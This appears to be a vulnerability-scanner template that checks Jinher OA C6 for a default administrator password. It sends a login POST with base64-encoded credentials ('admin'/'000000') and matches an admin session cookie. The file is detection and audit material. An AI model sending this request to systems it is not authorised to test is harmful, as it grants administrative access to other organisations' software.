id: jinher-oa-c6-default-password

info:
    name: Jinher OA C6 Default Password
    author: iak3ec(https://github.com/nu0l)
    severity: high

rules:
  jiner:
    request:
      method: POST
      path: /c6/Jhsoft.Web.login/AjaxForLogin.aspx
      body:
        type=login&loginCode=YWRtaW4=&&pwd=MDAwMDAw&
    expression: response.status == 200 && response.headers["Set-Cookie"].contains("SessionIDAdmin=") && response.body.bcontains(b"\xcf\xb5\xcd\xb3\xb9\xdc\xc0\xed\xd4\xb1\x7c") && response.body.bcontains(b"\xc4\xfa\xba\xc3\x7c\x7c\x7c")  # nolint[:cellint]
expression: jiner()

